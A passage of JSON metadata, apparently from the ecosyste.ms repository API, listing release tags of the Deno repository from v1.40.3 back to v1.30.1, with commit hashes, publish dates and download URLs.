url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/host